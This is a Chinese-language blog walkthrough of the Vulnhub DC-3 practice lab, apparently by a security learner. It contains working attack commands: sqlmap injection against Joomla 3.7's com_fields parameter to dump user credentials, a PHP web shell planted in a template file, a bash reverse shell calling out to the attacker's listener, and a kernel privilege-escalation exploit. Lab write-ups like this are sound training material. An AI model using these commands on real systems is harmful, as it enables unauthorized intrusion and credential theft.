本篇为vulnhub系列DC3啦,距DC2这段时间发生了许许多多的事情,有好有坏,都过来了,这几天多了一个特别的人,是幸运吧哈哈哈。哈哈哈哈哈……开始前说点废话,练习过程中也是参考了许多大师傅们写的文章才完成了,在此记录一下,也非常希望师傅们能指正错误。
老方法,先用nmap扫描一下,对师父们来说都是小意思,就不在挂图赘述啦,得到靶机IP以及只开放了80端口,那么直接访问web服务
可以看到直接就是登录页面,我是先用dirsearch扫描了一遍目录,扫描出来了后台登录页面以及其他目录,后面会用到,现在先不说,然后用cms指纹识别插件看一下网站信息
网站cms事Joomla,操作系统是Ubuntu,但是具体的版本号我们没有,这里有两个方法
查到版本号后我直接百度了对应的漏洞利用文章,找到了sql注入,可以直接使用sqlmap跑,当然参考文章后发现大部分师傅是用searchsploit找的joomla3.7的漏洞,不过最后都是使用sqlmap注入,emmmm渗透过程就是这样,需要用不同的方法达到目的,不管是百度出来的文章还是searchsploit提供的都有payload
sqlmap -u “http://192.168.16.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" –risk=3 –level=5 –random-agent –dbs -p list[fullordering]
下面直接开始跑
可以看到跑出来数据库了,那么就往下继续跑,由于贴太多图没必要,就直接放最后的结果啦
payload:sqlmap -u “http://192.168.16.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" –risk=3 –level=5 –random-agent –dump -D joomladb -T ‘#__users’ -p list[fullordering]
可以看到用户名密码已经出来了,但是密码是经过加密的,可以直接用john直接破解出来,john使用方法这里就不再说了哈,百度很多文章,下面直接在扫描出来的后台登录页面登录
登录进去后就寻找利用点,本来以为会有文件上传的洞,后来看其他师傅的文章发现可以在模板目录下面写入php文件,那么直接写入一个php一句话进行连接
不过需要注意路径,因为是在beez3的模板中写入的,所以文件路径就是/templates/beez3/html/shell.php,当然师傅们也可以写在其他路径中,能getshell就可以哈,然后使用蚁剑连接
但是现在只是www-data权限,无法访问root目录,需要进一步提权,为了操作方便我们先反弹一个shell(其实这一步可以省略,既然涉及到了还是讲一下吧),本来是看到靶机有nc的,然后就一直试着用nc连接,但是一直报错连不上,后来看师傅们的文章发现是因为sh解析问题,于是用了其他师傅的反弹方法
kali先开启监听端口:nc -lvp 8888 然后在蚁剑中反向回连:bash -c ‘bash -i >& /dev/tcp/192.168.16.128/8888 0>&1’
这里简单解析一下bash反弹shell的命令,如果师傅们想了解原理的可以参考这两篇文章:Linux之bash反弹shell原理浅析、Linux各种一句话反弹shell总结
bash -c:使用bash执行-c选项后面跟的命令 bash -i:产生一个交互式bash /dev/tcp/192.168.16.128/8888:与192.168.16.128:8888端口产生一个tcp连接 >&、0>&1:将正确输出以及错误输出回显到攻击机
反弹成功,接下来就是进行提权了
看了几个目录后发现没有什么信息,这就开始提权之旅,不过也是看了大师傅们的文章才知道的,可以先看下靶机的版本信息
可以看到是Ubuntu16.0.4版本的,那么就去searchsploit看下有没有对应的利用脚本(searchsploit我在前面的渗透测试Vulnhub-DC1中有写到)
对应的提权payload有很多,我也是偷懒看的师傅们试出来的脚本,然后直接查看利用方式
后面直接有exp的链接,是在github上面,直接在靶机中wget下载是不行的(也可能是我的网络问题),需要先下到本地,其实我本地也访问不了,开了VPN下载的,然后直接让exp放到靶机中,这里有两个方法
能看到,先执行compile.sh文件,然后再执行doubleput就可以了,成功提权,最后查看flag
结束啦
暑假开始,我这个网安菜鸟也会好好利用这个暑假提升自己,也非常希望各位师傅能多多指教,就这么结尾吧,日后请多多关照!